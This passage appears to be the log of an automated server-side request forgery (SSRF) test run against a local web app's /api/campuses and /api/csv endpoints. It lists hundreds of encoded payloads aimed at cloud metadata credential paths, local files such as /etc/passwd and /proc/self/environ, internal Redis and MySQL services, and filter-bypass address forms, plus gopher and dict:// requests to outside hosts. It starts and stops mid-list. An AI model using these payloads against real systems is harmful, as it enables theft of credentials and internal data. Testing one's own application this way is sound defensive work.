+- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=instance-data` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A22` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A443` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A80` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/campuses?url=loopback` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A22` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A80` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A443` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/campuses?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/campuses?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/campuses?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/campuses?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/campuses?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/campuses?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/campuses?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/campuses?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/campuses?url=127.1%3A80` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/campuses?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/campuses?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/campuses?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/campuses?url=2130706433%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235521%2F` +- Testing: `http://localhost:4200/api/campuses?url=3232235777%2F` +- Testing: `http://localhost:4200/api/campuses?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/campuses?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/campuses?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/campuses?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/campuses?url=0%2F` +- Testing: `http://localhost:4200/api/campuses?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/campuses?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/csv +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/csv?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/csv?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/csv?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/csv?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/csv?url=127.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=0` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/csv?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127` +- Testing: `http://localhost:4200/api/csv?url=127.0.1.3` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.0` +- Testing: `http://localhost:4200/api/csv?url=2130706433` +- Testing: `http://localhost:4200/api/csv?url=017700000001` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001` +- Testing: `http://localhost:4200/api/csv?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/csv?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/csv?url=google.com.localhost` +- Testing: `http://localhost:4200/api/csv?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/csv?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/csv?url=2130706433%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235777%2F` +- Testing: `http://localhost:4200/api/csv?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/csv?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/csv?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/csv?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/csv?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=0%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.1` +- Testing: `http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/csv?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/csv?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/csv?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/csv?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/csv?url=127.0.1.3` +- Testing: `http://localhost:4200/api/csv?url=0` +- Testing: `http://localhost:4200/api/csv?url=127.1` +- Testing: `http://localhost:4200/api/csv?url=127.0.1` +- Testing: `http://localhost:4200/api/csv?url=localhost` +- Testing: `http://localhost:4200/api/csv?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/csv?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/csv?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/csv?url=7F000001` +- Testing: `http://localhost:4200/api/csv?url=2130706433` +- Testing: `http://localhost:4200/api/csv?url=6425673729` +- Testing: `http://localhost:4200/api/csv?url=127001` +- Testing: `http://localhost:4200/api/csv?url=127_0._0_1` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/csv?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/csv?url=localtest.me` +- Testing: `http://localhost:4200/api/csv?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127` +- Testing: `http://localhost:4200/api/csv?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=0x7f000001` +- Testing: `http://localhost:4200/api/csv?url=017700000001` +- Testing: `http://localhost:4200/api/csv?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/csv?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/csv?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/csv?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/csv?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/csv?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/csv?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254` +- Testing: `http://localhost:4200/api/csv?url=2852039166` +- Testing: `http://localhost:4200/api/csv?url=7147006462` +- Testing: `http://localhost:4200/api/csv?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/csv?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/csv?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/csv?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/csv?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/csv?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/csv?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/csv?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/csv?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/csv?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/csv?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/csv?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/csv?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/csv?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/csv?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/csv?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/csv?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/csv?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.0` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/csv?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/csv?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/csv?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/csv?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/csv?url=3232235521` +- Testing: `http://localhost:4200/api/csv?url=3232235777` +- Testing: `http://localhost:4200/api/csv?url=425.510.425.510` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/csv?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/csv?url=%5B%3A%3A%5D` +- Testing: 